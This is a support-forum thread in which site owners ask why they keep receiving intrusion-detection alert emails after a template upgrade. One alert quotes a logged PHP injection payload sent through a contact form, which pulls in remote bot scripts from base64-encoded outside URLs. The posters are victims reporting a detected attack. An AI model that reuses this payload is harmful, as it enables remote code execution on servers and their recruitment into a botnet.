security attack after upgrade to 7.0.5

Hi to all, i need help with the securit attack.

I have both setting Total Security Impact set to -1.

From when i upgrade to D7.0.5 i get emails with this message :

Total impact: 36

Affected tags: xss, csrf, sqli, id, lfi, rfe

Variable: POST.author_name | Value: [php]echo(base64_decode(\"Vm9v\").php_uname().base64_decode(\"RG9v\"));include(base64_decode(\"aHR0cDovL3d3dy52aW5jZW50dHJhY3RvcnMuY28udWsvaW1hZ2VzL25ldy9wYm90LnR4dD8=\"));include(base64_decode(\"aHR0cDovL3d3dy52aW5jZW50dHJhY3RvcnMuY28udWsvaW1hZ2VzL25ldy9teXNwLnR4dD8=\"));;die();[/php]

Impact: 36 | Tags: xss, csrf, sqli, id, lfi, rfe

Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2

Description: Detects self-executing JavaScript functions | Tags: xss, csrf | ID: 8

Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43

Description: Detects basic SQL authentication bypass attempts 3/3 | Tags: sqli, id, lfi | ID: 46

Description: Detects code injection attempts 2/3 | Tags: id, rfe, lfi | ID: 59

Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data  Threshold: 3.49  Ratio: 3.3684210526316

REMOTE_ADDR: 91.204.149.250

HTTP_X_FORWARDED_FOR:

HTTP_CLIENT_IP:

SCRIPT_FILENAME: /var/www/vhosts/xxx/httpdocs/contact.php

QUERY_STRING:

REQUEST_URI: /contact.php

QUERY_STRING:

SCRIPT_NAME: /contact.php

PHP_SELF: /contact.php

And from yesterday ( i don't make any change at the template ) my menu look like the image in attach.

Before the upgrade everithing was fine...

Any help please ?

you have in fact cleared your cache and tmp folders?

Yes, i do that after the installation...

im not sure how you can get these reports if the setting is turned to OFF. can you verify that your settings are -1 on both, because from the message, it appears you have it set to fire on a threshold 3 on your security settings?

Same is happening for us too... both settings on -1... yet a security report at least 10 times a day (and the report is usually regarding my IP address). Cache and tmp folders were cleared.

@ DosDawg

Believe me, the settings is to -1 form the D7.0.0 and at every upgrade i make i check it .

Also yesterday night, after i clear agains the chage via FTP and from the Admin i get 3 of this mail.

Every mail is the same ... I really don't know what the warning means, and why look like the problem is to the contact page for this i ask help here ...

I will try to contact an agent...

Thank you.